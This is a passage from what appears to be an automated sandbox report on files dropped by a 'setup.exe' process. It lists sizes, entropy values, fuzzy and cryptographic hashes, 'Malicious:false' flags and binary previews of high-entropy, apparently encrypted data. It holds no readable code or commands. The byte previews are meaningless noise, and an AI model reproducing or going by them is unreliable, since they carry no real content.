              SHA-256:7EDB5531095F9981752E59C1AB13E429FF4F5A75881871AD9FC12B9F863A13B3
              SHA-512:DE82F62263B34CCB433FDD5AA2DEDDC251EB7E8F435BF1F92794230E3D061121FD9DC8855E7BB65DDC569BA8B7BAA6FABCEC294BEE7DD50C2669947AD0FA4A57
              Malicious:false
              Preview:<?xmlP.A.U%5.Jo.u.d.+..><.<.$...F.....S.Jfgo.Kq..W..$%YG.....+.0.....Y..+*a.....3...`........h...........A.t6'(+V....y}.(`..J_U....\Z..H..Hq..l.y)Bx;...O7I....Z..h...3ZuFi.jq.)K.}O...k.[.{.z..[e..D8...".MOe!.+..0...u..I........{..i"....`.Yn..vLL..G1.>....*.......@..)..OY..C6.FGB04..P..8..-.....H.1.dq......`......d..rr....T....|S....8......V.....KT.`.N...[....p..!...|]..r.{.5.Z...>.[9k.#+.._.M..6..:....}$.W...0...MQl...["}...)....^.....B.|.\..d../WJ.,h...R.Y....5.......^E^..X..@*%J.....<.70..q.U....df.x#..[..t.6......[...5c...'(.....H...2nq" .%.[.W...Ou.<..]..8.[..%(fc.........~Y.I.B..2......l.f.vx. r......3.......,..;t...|.|....v.[{-.3A...AE.&..@2=.....%QQ...,.....rI....~....m........B..I).'.h.."d...~).x.tnux}c..&Rh..9..5.#.|.FG...[?{......X......|'W....I.......Z.6c....=.(..."NY.....=.c.....S...6..@..TO.......m.._Ga.z....!.X.....XB;......w0<.,*......W.:..AS..,..;.:IZ...:..QO+*....OL.o...b.@.WS..x_....\..../.."I.v.n..c=g....M.[R.1...x\#~h..A....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.862422585026814
              Encrypted:false
              SSDEEP:48:Agnr5LJE5+bYNu+KBrOx8D9JaEuO1OX/OB7FSdfsvCzD:ndLJw+Au+KBLTuGu/O9ofYM
              MD5:66F03ABC999992288AB724DEBE50C83C
              SHA1:48D04389220DB34F0571067200F4FA59EDB383BA
              SHA-256:C5AA0846ECC41D2EA338E469744CDA5C39BB59808E7B1BE3660BB8FFDA8269D0
              SHA-512:95178D2356B1B36F8CDED27920A5566026D12D720E300627FC416517B46DEFCA2178C596732ADA11785C76E0E8D0F3C8B82479F2862391092ACDB95042C82465
              Malicious:false
              Preview:<?xml=.i.C..........'...l.......UB.....b.)..i.. ....L......(g..[..U.Z..V..Y...p.$.:T.".!.......y.k.F...G}\..{*....C.....9...G.(.p....5p.1n..\..f...G...Oa.?......ia./Z.<..X/........R.....,......mGbK..X...If..5.Ty.....V..f.b~...7..cG..}.`).t..(.....3A..........d<.}<.gX....~S.4..=wG/oy.k/.*.}.j............#...RI[P.8..ch..[.{...C:..oam.DJ...y..q .c.6..Nf.....o.b....C..-D..3$..=I.b...5...2.....FK.=F._y/...j.FZa...4.J....;..Q5_H.#...X.DMax..ZM......H..Lst.1.!B...P..F....`\..+RT...t.."X...qd.*.7....o1].N.........t...\z....i.<=(g...7..~q}..be...`8p.H.3..~O......|..o...Tc..7.B....%x.`L4...M...e.;.r."...i,J>...4L...."z...bx.....z...,voz.U.m..<./J..2....o....xr...^%.,`.t...:%..L.D&F.....5l.S.Z..].$/.T.o.c..^..S..3....?.{e...i...m5...J:.;.}.h.|;.*...^X..ma'T*.o4p...I.....E.9.G.%.W.F.g..5].u|hI0...]`;O....F.6G(...J|m(w.....g^.7f>*..H.4.j...F..'...;.V'......n._.....P..i.|.G.{..?.......i^D`,.]33..r.{..&.#....F.....B......|.S"...c.....'.....C.D.uS;..8.[8
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.872525562156554
              Encrypted:false
              SSDEEP:48:DuiOisPNCWVYi4J7ugoB3zMZfCgBzl983iUCD:DuiOBNBo7po5effP+yp
              MD5:63994599857B619A12868D65E2E84641
              SHA1:150D3F7F039A744BACDEC30C730464E35A8C9342
              SHA-256:01F6F90CE64ADDB268AF18FBC2DE5FBCC34A26EA067C8C670DBAC1CCFDE5B44C
              SHA-512:2AC4E640BD0839D63FB00DCB4375755AFC81485CFA1A43AA3919974D04350B17F41E14B9CA51BBF8CAEAAA14A1B5B772E91B8CB15E2AC980A6739BFCEA2DEEE8
              Malicious:false
              Preview:<?xml..+.a......v.H.0.JP....Y..K."r\.X..oB....Y.6..3..&."..'.v...g..^..Ii..$+....n;/..5.q..+...}.T.)..'.\7MK.X.Ln;........j..[...!..`..<H......WBiQ.......:..Oj..._......".M..v.mZ..t.D.9|y.V..I..x..X.3@.8..4..)....:.b.".j....M............2....:| 1.8/z..F.Zc&..pI..H(.].S..H..CM.E.<e...H..<....9..1...[....tR.#......+ .I.....lS.....*..8........n..".5B...7.1......E4.TH....el.S......'..!..$.m..:.y$..^=...k.=..U........T....u...qG..)...E.1rO.B.0.+....o.jA$..^..a.$..~o.../S...!...4%x]b..0..L.6bS..V..I.FuV....SI../....@.S.S..dMg..o.....an@Q.....J...n8...X.-.$..7...8..._.r_.....(D..P.....%...V.P.#.......3.p0%.:be...%...o..Yz.q[.A.....!..4.q..-.Xg.&...<Zw.g.W...6.f..|+.....`@&....X....*....y%...h|J..g.x.R..pF.......u.&L...{..X...Q..d....+O.K|....p..|.?Y.D3|W..S.t.......q%2.:a.~D.=.UR.......%.+.t..t.......&.nt.=.I..M..a.t.q.^L_..7P.U.w-.^.ed8.._..7..E........F1_)cn.8.[...-..7.Q.....2,.....!..L.?..@.G.. ......:Ht.FL......w6./l...C7...0t.9.v...&....v.H.2*"*.G...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.893604544378164
              Encrypted:false
              SSDEEP:24:9WuMW67Ac2GtmYWNSRdd5AqLUP+OpW1rJWThxUvx0abUp3UgdWVrVC4IGbD:9xt0A+28dcdP5W1rshavx0abQkgoVZfD
              MD5:E6828C45FD23F5AC763FFF826AABA9A1
              SHA1:420A1859093EBE33DC2BE4121CCE0E7CC6C1269C
              SHA-256:C30946B83A6075DC25683AA6B36DFC76EE699D71EF3096FC1B95C6E0412D3435
              SHA-512:8B5DF84F22F1D19CE68117D8A27193FE101BB260A10FEDD417B38714A21AE070BFBCEC2E33BD96367448490751C6062FDAEA281D3965578270DC56FA27DE29F1
              Malicious:false
              Preview:<?xml..HcrW{.....g..;...H%....q^..uH..0...]...'.Y.S..f.2...)hP_.}`w?:..e..Va......#.I.m.$....d.........&..>.c.P..}j ...X(...x..4.!.{...a.j.s.1.q.....#...<.....H36O.f9:A.?J.T.Yvy9....z...c.0..o.....7.H.../:.M..e.!.K@...... ol1t...5<.61.. ...a.;p*$j3.Pr..).Wa..H......q..i...3]...*o.E#.d...> T..58.o.*V...D.....jg.S....Z.C4..`E~'"=..1...ZO.^.5Q.v.G...s..I..P7o.95.)3H...f.=...B..IPE.9h.C9Q..e.t'Ob..j.r......G.'.*@.d....X.n#....<]...v.........\^%.....;I.......Fx.h....>\.....m.................U....]..M..V[%.f0......l....{./.A..5gp...B~K..m.w)Z..q...!..@nw.q....yv}7...]Q.u]z.>..F......'-y.'.0...[.e./o...|...u..9..f.cKa.~....Uv...G.%.7[...L...p.....Q.9..w.T.C.V....{+&.....w.n..=.n.E.../...F.....q.Wf.....^.D..JeZ)X6ifv.A.\^..2..t1...j...".e..lg..r.F.d.A.Q......D..K....%...w...Gg..q.B.8..s.D$.....]].g8;.d.....r....~uv.#+..S....^.r..........P..u.c...z...:...<N.uz...$....T.$.{+y..~).E........7...W.[...Q...f...r..v..W.(..cm.Qg.3(....<z.....m..f.w...H..H.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):7.8960646921710556
              Encrypted:false
              SSDEEP:48:VY8F6lU5AwiX1QbgWO9is7MIWFIBeantX7LxWLaRD:lajRX1QSiokK791
              MD5:F472F8F7EEC427CED1609C75862C9BD1
              SHA1:5B2052426B11EEBB91D22105590E94B85896EF6D
              SHA-256:41ED58FCDE0F705ED303DFA58965222BE8B608A23A4966D00492ABDDFEF60262
              SHA-512:E6CF29B7DEC4BDD128308E572089EE2B78834D5BEFBB156566E2C884A107BC7981784C2433846982710F33343860ED7F1AAC8DB49DB8D9BCBF55D8BC18B1E892
              Malicious:false
              Preview:<?xml....T...d.N/.l`..2..Tt...q.u..... ..[H....J...7.M........$..~...7xe.?..r..ARR5./l.=.J...sHX.Q........._....d&+i.E6..y.*.......u.(...........p~.\}.F...l..H'V......V0...A[ALrTn......>..../.<..4...Y.....c.s"..!..Ea...;{=y...4+.D.n..D3..x@jm.[._....<...y..r..........y.....U.k..s...}G...Pg_.....L>..b.}.........4uJ..z..$......D.......<......A........x..89..u..X7..U...F.. ...9..-}L>...3...m$+PJ.n.......y..^t.0l..|...[.....d.~7......S..7a.".....Zw.<.........WjE.q}S...j6RM.....7.'.....P..a..........Qf...u....h.w......[......@Zy.Q=9..@...>l.1.Os.%.F.B-%.a.....I.|2d.ia..W+.....[.`:...?B...5.3.....$N...'...Ev',...%.hE=G-S .Y.q...v]^...AqH.E..x.NU|.m..'...j.<..c...A..r..9x....p5).:f.....M..tH!Q....4.B5.....-6;6..<..uw.y$....wP "fa.@..1.Wexr9+..(.O..zI..1...#{6|.:fX.g......K-.G.nq.y...4..F..F..A...:._....]..bn:2\.?.@..7.t.7wZ4../(.#.. 3Z.........hRl...Z.I..gY.\E.b}....Ij...G...Q...k^*..4e..p...y^..|.7.XX.....Q.|..*......~..ol...~.xb......z...?Vm.~.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.882610440748332
              Encrypted:false
              SSDEEP:48:GPK5Fsi3vjkxlYNZB2T8VRO4ofB1whw75D:GPKYXyZBm8O1B1Jx
              MD5:BB09CCBD54103BCED64D6ECB797499A5
              SHA1:76FBC9F5AF32903C0C608A433018D1DF8BB2E21B
              SHA-256:47FE6FCAB0F8D2E680BFF0D6C77FD85D6FBFF8F18E790F8CF1327736F13D8500
              SHA-512:7D666CC7F20970D60D5DC3A255C28ADD9C8B5062B43A5A95DD341EC71A938BB3F2950445779FAB0A3D21C39E9FF48BEE5CFCF23C917BF993B561F70F966ACAD3
              Malicious:false
              Preview:<?xml...A`.2tmk..fB.>..F..+./....E...Rq7n.\{..~....R.].d.&...J]......"L.@C......]..4..f......u......Y....*...N...... _0.2.g..w=...Z..Y=s.w._[..y..:@2(n.w3.hgu`jo..[^._..^2...97..6..."..)2....O...8.......... .X?h.P.......).M35c........Vk..ueN..,......0...4..E6..\AnJ...H$}..kH4D.X....r..........>..:=....xb...E.>C .g_...@..^MJyT@..[%n..yI.d?..L...]D5.Bb....N#.B.X....cLeV|.z.Pq)...,\..V....x..|)...\.H........-_....%....Gl..H.*............4>g.O...<6m.;.7..5B........j..BUXB....).e.N[![.+n*d...F_.X...."..O.k.-..V.f.A3...../P.g...#...PG;IKz.S..[...j..R h.....[........r.?.Q...#.i.WdQf......4'..F .....t....+.5.C.T.MV7I...Kv... .......tb.`.....(.w|H..r.>.&;.7.........p@.....y$ in....:.......v....1.alg.~...j.|...,.&....W.7.......-L ....'...VA.3.2(.Q6...I.....AX..T....J.......2RK.3/..T.F.$..]N...od.Jbg...s10......h.....*.kA.R,.+.r....`.v.K....@c b._[.<L.....,#.n ._p.x6...qv..}{....YV.....)H<.@..{'..y..@.RW.....l.U.=.....j.........W....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.880663227781919
              Encrypted:false
              SSDEEP:48:w3BYAk9v7nhmAd2MpvEg+x3+OorpoiLI+Gt2nD:w33UbcDqiXotoidGts
              MD5:363AEBC445BE45D214A5B2FE2EA80DF9
              SHA1:85A5003ECBB341F40F8090DBCE0B10D07570EAC1
              SHA-256:5172EC4DC074753D4BCD6160081F61331503D25E0975A4979B2D2F49CE8AE4B9
              SHA-512:72515D1D1141714B251F554DFD604CAF154E2F7D05BF1BF251E4D9C19601CF43BC4065E39DC91304A14BF6F5D5896EC404C85F03581C6312248B75894C27C055
              Malicious:false
              Preview:<?xmlb.....g..c..2.....da'g..n.E+...J#2...U.EZ#.gmlU/..'l../j......Y....I.....7/..g.....cc 3~ Qkv<.gI.-]...D.....>..Zx[....`N?..JO...~|..A....s...K....-..........g8 D.2 5aZ.Q.=...rOK..p.o...0[...F.?....6.Nl@D.oG8....(.2tl..a..K.}fx...%.C>..8E.0y.....IX..E.v...b......o.L...s..F(...qC%......"..j...+.........T..m!r.....9.5...O..Rw2Lo./......M.."P..5.8KE....,M.4........N.g.@....r..H].+.k......iM!.D...E..~UD..q..4.......O...Kj.).:....g).].....rr...=.....*.*c.....O...^..p....&e..!.M%&^..@.G...\KY.e.&\.....T.Y...wN....PPk8..).i...2..Z..(...Z..n.H....x`.?..m\.N..\............ ...e....".....m...V..s..........p./.?.A..|....;.s..) .H...+.....c(.L.H.{...9....J...;.>..vF...F..F.0.4..}d...W;.'.I........>e.LkP...-{.3..........?Oj.A.]@`.kYDMkS.j.-.AI{.z..........X.......=.*Z..........Fo..`....[..-...-%.Br...`nZ.X}....4.`...%B...LK........(......)5..P..P..h..gJMPm.....U.V(.j..}27.^.b.....(.......w.........R..Eg>WY.>...P.e...x.W...J.f.U...!
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.882192688739101
              Encrypted:false
              SSDEEP:24:gDM+dwHlpsr55CkX0ylnABVQmorZyPA2vCADol1C99K/l+3CPsEsr+K75gKcqQf+:5TFpsrV0ylrJ8Nvulm892ia+BlfKB7D
              MD5:FAD2F8401E081676844D1A0645590DB3
              SHA1:E01D9E9DDAF9C2F804D2C427887E8383B770DF98
              SHA-256:271BC079289E53E090128EF491ECAF416073A773BD3F9C99222499C1369C3E22
              SHA-512:58FAAE6CB176568A0DD21FD89EA2A0C67E5A7331D61838B772392B1802E453F16157CEAC333E63ECAF49E0B55A9DA430B8252D54998F5F031CC67CDF05219022
              Malicious:false
              Preview:<?xml.+$,.]}....&6.A...A$...=.D..n).c...5.......K.... ..}...5:.5?y...T.n]~v1....n.\...F.........v..a.`38..{.5.$..........`pv.".N..^$B.buH2.tq#%.#q......p(.Kr.-q.........n..E...../......z....W.@w.E........B..e....N........#...d.,.-...o..#.RbOM........w.e...(.D.h......%..$g.F.tJ.'...7.o.CM.oS'..<.Ng........./c..(..*..j!....uf mhZ..j..<"=..XA.t.....`...).`.............4...X......`9./.).6<.....m..e.Z.n.(*u.[...........Bt.D.W....C..MO..A..*...$...#<......3.xt..l....y?L3..HYO....e...1.U.[C1@.'.$....S~pm...a ..fz..*...c.\..b.|.........s..@`'l7.u7...UT.L...4..3..Q0.O,d......S.#....b._.D..j/....j...9i6.....bt.}...[.o.*....D>..j......{.-..\.+c.d..w....A~.Q..s....X..P......J.c..Z!.W...;......... .#...~8.2.x./2.k<.0....qb.Q......T.2......t.v..0....m..$..jJ..O...6..+9.f.#..F..j..~.R...!d..{F..........;...A.^"..n...c..?.Cz.w.d..a..F. ..Qf(....L.......<..T........U>..i..CG......P0....l6.n.GQ./L........H.7#.A...KD....+7.z/.O}.p?0.k....f.+......N..L&.`l
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.885346395114871
              Encrypted:false
              SSDEEP:24:qiN+atkKocePjoP7fVB2zMx1vC2Ov7g4pcBTUi/Gutl9bXafYBBUCz0iL3e0TcK+:qQZWznjIr8A1vYv7/I/lxKiBF7edKmD
              MD5:C8B37316FEB5345511B68EF7DC2E3FA3
              SHA1:B8525A55D20F9E3DE25AA6C674AFCEAF905E9BAF
              SHA-256:9BB4F7BB9574A59F64522BE49D023BBADF083578B620B54FB6847C9CFC9EFBF0
              SHA-512:316D543A8C626F441DDFEC74833F6F7434FB49DCB736283ADEAF17A6E4D297153E59B17D3B39742BE53E31EB48973F8739FB02F5B8711810709355D0D9F4DA92
              Malicious:false
              Preview:<?xmlXP...u.LE.E...M...N......1....^g...ah...]..;`$.kq...W..g..J.l.F...g...8.|......-...i.{......;.?.$..l.... ....M.EU..E.`......yf...wK.W...........O'.('.UG.}.~3d.I'....HSh...U._l..X...h2....T....8..J...@.......^...1<o....0'..3...u..I[EM#9^.I..j..[..n..U..;.{..R...i t.k.....]...f......l...ci.^...lr..#t.U/..!_/....J.0Y...)....Bk...<.lk.....T=.4=D..m.4.|..E#....t.}.....#r..a_....s;k....&.U.y..u..1L....Pm.......y.....C..L..(.`...t..{T\...M.......b.h...o%.4..=4..g.t.k.U...I.\.%`..I..x.....*.e!....m.-u4..U...e..UR..}k.@q9C.....".B..%......8.....e2Ec_. ...c..V)....Q.m.MU..F.N..sU....y....:.O..z.b.DD.G...}.4....g:..........5.hx.)g.&..YEL..Z...Y.[..g..U...3...#.<..\..Gh.C_...k...........H.|}.....P.$...6:.@..U(I.......|.>...9.$....C..U7..'-..T..r+.CL.F<...gS..G..e2`x..h.....].*w...)....s.....0C.(.7..g..-V...D.f.%...\.2y.8.;eeu...).3.:...<{T....E...o.h.....#q.N.+....f.`.....^)..f..{H{..I.R...3.{N.a.......lT.>....\>.5u.x..L6NT......V....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.862845920597969
              Encrypted:false
              SSDEEP:24:y/HWC5hNC9MDJGcF830pjehWVbANFytqVWEor+GoQAVKn0XrWPSRjp9Q13MGRmRI:22C5hBT83JWFA6qUE+foVKUp9Q1qRsD
              MD5:748A351AA2D046E3166CF956BA559932
              SHA1:D5C4986F35A32D96DBEF438F98888BB6C4BFA31A
              SHA-256:37F01891E1470C2AA050F4EDADA6BAF094AB8016EA9AB16DD20BE10385C88657
              SHA-512:D2E40F568FB163BA0820BDE167EDB126246F3BF3C388FB329CA59C8751E7B9EA67445BAAEA0EAADADE8A01F9FEAB37E1C2727897497A360917D31C901B79BD5F
              Malicious:false
              Preview:<?xml...0.!.Lfn=.RL.VS......\?N.9c.`..Gi.40.F.J.:.&......<9.C....>.J........P...sS....{D..V.C.\.e...@#.^c..*.e..n7..}......mv..P..g6.4.)(.y3,8 .1..\...E..G..Iq..j..Nl/..S3.......,..Q6.T...{.$}*5..W..#.$...$...|...i........?..B..xS@..[.y.z...Is|T...X.).3..)c.[l..=..Bg..H.._.D.......^l..jH..q.g...&1s.z.*.,.A._....;.K.-.J..P../axx.,.;......N}...U...n..)..t`s../...j......"E..+.......(=..r........|.xA)@?.......P..f..3.Ef.k}N..5.E.d.L..0m.z...M.'......N...........*......a0I...w0&.-S..C..z /Z`.E...*.,,..W.%.C.....S.0..o|.....k.Bs.._h.gap..[L...).-2e..A..9=...Qy...`m[.N....E.E..6.Nz......Q-...qC"..:.O?7......."...,:..1..}.E`..R..(.....&...%......?..>.-...a.......-....g.,..1.E.N1.....`...L..]X.7q.8....o..&L.5....:.&.^.....9..c..G..<G..NQ.L.oy...=..kU^.j...L.R......d.2..SG.~C..)...'r...I\...H......V-|..C.i...3.{../s.q....v..Vl...5.Y.).l|`.$.....#..X.X.]....~...g|pZ..L....pp^..+..&...@x%W...2&....k.....%.....?....t+m..vIW.......0Kv....>T..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.892765432710163
              Encrypted:false
              SSDEEP:48:5mtD+MLDXJyXg5YifocFn+QOJibKDFvzxvh4RgdqKD:5hsXYQqifoQnSrx+RY
              MD5:DCAA13CD2CEF51A95A694012AE6AE92B
              SHA1:25058347E9EF4658702747AD12551BC4CE8EEB14
              SHA-256:BF3F89CB194B8C576BC9C519265D5E675D4EEED70A9C973D4AE1869BC52E2D46
              SHA-512:E22BE360CB4E46D2DE352EED1B664BDEE68C75BA855E7F3B87816F7F10D199BB14A18AF77B8B5292FB29E721C98963BD5F880462C1FF350CCA209B6402CD191F
              Malicious:false
              Preview:<?xml.?...))..%.. .....'.S.s,.,.o.A*..4rz.j..N.p...g./.e.\.`........A...!,a.:......y.....L..=.M...!.....to.(.....U.H.l]......y.....e.....H...5......"....AV....r...2.^.r......*dC.!.l.........?M.C.....i..l Os....%..O.r..&......o....kp.T...<..X.b............PF.+........G..........\VB)...`.%.h..%.@V3..!0..Hm..c...S......?...].@...-$.K.....$......<......3.I."L7..O......7.Tx.....2.^.!.....N........k"..uvM...)...K...4'...G.`...L....#&..H....$.Y....YcK._.....|'..).m8.#{.qr...E.6Sq..e...|......uo...'...j...J..Kz.k.pk..48..0>.8[..FO.?F|...T...X..U.] .K..e.G..8gm.`..z.T.A....*Y....#.ly..+..h.}>~.R......80l.Rv.!.$.. lv..`...n.....(..w.D.h...J...........]..s ...c}............iQv..1.[.........IAD....:...F...sJ!....:..A.Y.m.N.&...Hp..G[.C. ..k...\[...V....V...f3..._d.Vw.:U.iv.S.`.S.~N...B...<V........g..p....th..4).H.!.Y....(.....a.!g...O.....k...ur...".P. I5..,..rt.......K`..I...x+c.l.... ..1`y....).i.9....L[R...,..G...S^Y*..z.)...tB.M..3TJ.o.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1713
              Entropy (8bit):7.887400287463508
              Encrypted:false
              SSDEEP:48:wirbTSUYXEF3mJYaIl9QzWt9ofXaB6W4tQfX7Zzp3d11bUftD:wyvSU+EJgYiWt9QIrZz0t
              MD5:BA2E66B2B92787F3C6666D93F74ACB6F
              SHA1:3AC8272667FC5E05E07DDFBF6FF105AAFF769DBE
              SHA-256:8F24F95E4AB139DB8D34294924D2878C423F66DFF65420E38D1CE85501F73356
              SHA-512:235DCCFC360CE00762B2F6E0993EE1DA6B06DCACF96449823D6E10CEEB9C4ECF73D05BB4AB431374DCBA8DCCD19CC3F8BDD1DB2370674C7DD4982EDF9754702F
              Malicious:false
              Preview:<?xmlM.p...~.:...S.....M.6...Q........,Gy.'(.gm...Y..G...`o.~..;.."....R..x?I.hl.H.d..=q*...<Y....P..i6..l......E.@.}V%.Hz...TC........k.....s.qz..}...gZ.....-.......q.......[h.x....7.....|....J...S.& .l.0..|rAc`.~....me.!;... ....U..T.E.u.B$x....s....5A.m..6Y.X~fG.Ru0d._B..K......'.f..D.T..R..U`.m\."....)..-gq.5(/..G.!..r(/.ySl.....t..ic5^......FV.....'.....U.A.z~I.....T.u...h..~j.s..L.Xr@...4...U...@......E.Q-5.u.R...B.b.a.}t.5..0.G........;..b*4....#..}.........$A..1.@.zh9s..........,AZVz..}Y....|.1....F...!.6.!3..?!..6.3E...`N@^yP...g4m*.Ei.E..A........e/...f..~.......f...u1.?.f[A.......".WzY.....f{.R.....1.^\<.U..8%...)*z~...i...q2..N.;]U....c.N.L|.!....~.J,Vw......q...._'..$.[.3.e.F:.[=..s.._7<..T.*.....v)U|.=$.."(`.:..a)!1J....+24.p......S.).E..1=......F..N3L.Q........<..]..).c.....#(...k....4BC..,....?.....T}&.%.'5>..,.....?!..&..2......BZ...zd.C......jX....p.6=.......8.D.e..m2m.]eQ.G.(.,.n.z$q.....{..E..y:...c\.C...0.)*QU...c...A..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1750
              Entropy (8bit):7.886581822040493
              Encrypted:false
              SSDEEP:48:AVua4EcCdE3iAM8IpD9Smp+JCcCIwguQhM96qD:AUa4Et+Sb8IpDZ+JCcCslhM/
              MD5:79227531B285382D2E6DEC377E57AEAB
              SHA1:FFE0444E4B9489DAC1F8AC8B22A1D0F97F96AA21
              SHA-256:08D81939BC69BACA5302D7D0EAE9EA83B77E0B34885C9C0D7C8D9A59A487F420
              SHA-512:F0122FF3AAEFE98A27296F908AD3607D7677461934552A186A116DF5AEA276439D1B4DFE1DEC11D615DCFD57387B8D933F6A7FCAE58D233F260F8EFE99E1400C
              Malicious:false
              Preview:<?xml.,Q...6...o...9...mpd...&.m\P.E..H.]8...*........}.d....b6.5....>^....qs.D.%S=>j.2........En.....sU..5...?.7....7.U./3.;..I..&...........:J.q.0>"..p.F...)m.f.>....._W...d..*.j.........$.m.e=P.".|k.J.J...l..B.dc.+4..._.#..k.^...$.>rsYWdfz.....J.uu..}b..........o..U.u.....D#.. .......f.3Ql.t!.F.Z({...uDG<..[.lU.U.......E.....#...[.X.A*Bu...2.Y.*y................v.I.+.A./n.*f....2........t[...T.P..r.AS.b[.I5...z[.x2...dRe.....7<....j.A.Ag.9:....JJ..}.|..\.....Ja..."O$.&..l3..D.~P.T!....?rt.......W}q....!?..../C.J."+..o......Ut.t+...9.....0......&....3..7....h|R.N.M9.......Et.v,..x.S.c?....Q.zhs[..`./9.%3s:........:.P.....0&0......J%X.|.8............_.|r....&.@.Jod....`:.6..t...)..2.......{......f...F...k.@5.VeL9.....L.....(.UWkkx.q,>..&....8.k...L...ku8....~....9.BMs0..:.M.v..Y.....q..P.%....c...[...Y..%}|..fF...B.j.0.....O........Z...H....j&...=wN...a.q..sBV...us....u.[.4~..x...5.'..Oe......R.)..'...:Tv.....a.|.x\^$..E....Z9.im..:..%
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1583
              Entropy (8bit):7.857758088164974
              Encrypted:false
              SSDEEP:24:5VL9Kz0GCNYxv6l9B73eghrkYr8Z2UYaKE4wNs6cnidF720olwjRihN4TbD:7/GC+xylz7JhrDsUE4w+3+FHolUkuD
              MD5:639E8F15DC495D9F7C2574FBE75E4990
              SHA1:A0B963B9489AEA0A84542B43DAB75DF268F2C248
              SHA-256:2E828277DF635F1BC7634EE9D2FD8A6B6BFF6A4F1AA69010C3BB9BB11F6FDA78
              SHA-512:3C7224BF8ABD66B92CDD7C3301D44F5FC4B90C81BD57255FB9FE99432B0F1084342E5B9F70EE8AEBB66048AA010EAE6875EF124EC683C4DAC6E8CAA97696476C
              Malicious:false
              Preview:<?xml.. .HK....B....5....iE..G.....&..y.u=.:...k....tI.X..2....s..{mE.1.8f...z..*.P.....1.c. B.u.fe7.,%.q!.dU!.8..*....}..-..DO...F.e..wx.."..u.....].3...4 O.T........X....6#>b...!.i......V...C..$..C..9..E....l,..f.g..l.D~ ...O...#f..-l....g]._..*!SD..HlWu.3.j.}...Un.CP.~3..5r..Gt.O.qe2f......z.0J....EL6D..F...3?...a...F%:.....L.&.''I...S..lu]R. *]k<..kK........v.>4 ...=.r.x.m:.1..vx.N_....&.&.,T..n..a.b;.g_>....o..-3..A...w.:V.......Y....1.p..^..!...^O.j...............'.JH..e5x3.9.-`.#/O..H.JA....u..$.5.lt...Z."..d...!6W....L..........Q".c..#..\k.i......F...)6n5..B..d2.1.+....X...F....\....ol.l.BC....(.#.......V<...@.~.)C..w~..F..(...Ja.?...c.$HT..w..V>.G:A.......?Sk...r.p.MR..i.,....0D.@.....Y+c...^.Yn...Wi.h......#Q.j.N....h.I..[...9\)*e:..K......j..?.x6..........%....gE....-.a...:...my3.".g..).4JdC..}_6.....U.2.P".q.]...C......J...wg..i8.[...<.E..C.P5^..v ..1...@g.........].%B.g..!i...E.X...-(..jp.\....&....TBP.o...)3..v9T........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):361051
              Entropy (8bit):6.5141883687217215
              Encrypted:false
              SSDEEP:3072:v4kvWZL7zV+NSNi7x4uBpvukkCGNGAq8dtRepAKZsElPTCTsYwXC:Jv4PzVESw7xFzvuaIGxMtkwEl2os
              MD5:4DEF00520D39EFEA9A501AB2FC36ADF6
              SHA1:76A2D22B0071C06018081BCA1BA48BD1AA2143C5
              SHA-256:17D951476BA402FBBF6143C564F9A9EEB2570E3E97782FD79B034560222455A1
              SHA-512:86366ABBA0D0ED045A6256FA996396353C4846C3120E862145103D481C8889D75CECF6CD0D69DB5EA5DFC3E894B8C23AFB62C91E656C973ABFCC6E33BAF738A5
              Malicious:false
              Preview:<Rule.....K.~.Io..^f..&X.........-.*l..k.H..u..P..C..r..y3...+..=./].c.zP..iYF.Q..^.....$.r.........#..2..~..}R./.....6.c.P..^.... ..L..B...../...1....JC5uN..Z..'...F....8.`..Z.....z....1n.$;...7.....R:b.Q....".......9 ..hZ....J@......n.Dr...\.l6....9.;.A.r.K.I.....9.c.&(...x%.j...K......u..]0.d9J|...$.O.....r.6..4..%]R..2.ZZ^....'^-U..G..#...{L.!......8.G...N..u....8....v../,'.....^...+......|..*..Cu|..J...&.. .i..n...._BZZ.B.=>Kp.4vK._l......W..#k.0..T.>..x.3...3...9...h..u.......}...u..W6<..V.......~dB...J.^.1[1.4..VLL.'.4..f.f.C../=.{.=..O.j.r>..N*.~.z#dV.yW..,........O...PL...".N....?.}....v.E. .....|....BG.L.....<.&......&.(9..L....w?.y1.../.#...B.:.\.O{.;`.>..........Y.?n.."O......$.l].O.Q.....t...)..k....1.m....R...&.hX..ul.qgP....6..Th........3.2.....5 .?2..Q.Hr&.h.....<.N.'...xSu]Z.p.H...?.[....&..]6..y....Q$...k\..)..v&E;.Ik?.S].)F....K@-(...+......U.....T........s....1.hd..!}u......7%..5;...(.....-...`t....tUw.`.eA
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1928
              Entropy (8bit):7.886221599169127
              Encrypted:false
              SSDEEP:48:YxmLPq69DwYI98gD7ItAuZtIQXYqcl7BkvDJ9D:YILPq69DW98gD7ItAuxoqIWvDz
              MD5:AEA72DE75C8A248F02A0D1E1C626B67D
              SHA1:56E757876BD2C047E932C8E369AE7A88FFC9110F
              SHA-256:210114A3074D51A0E47819C3CF6E5350BBC22E2678BB93001DB150E75B05DF90
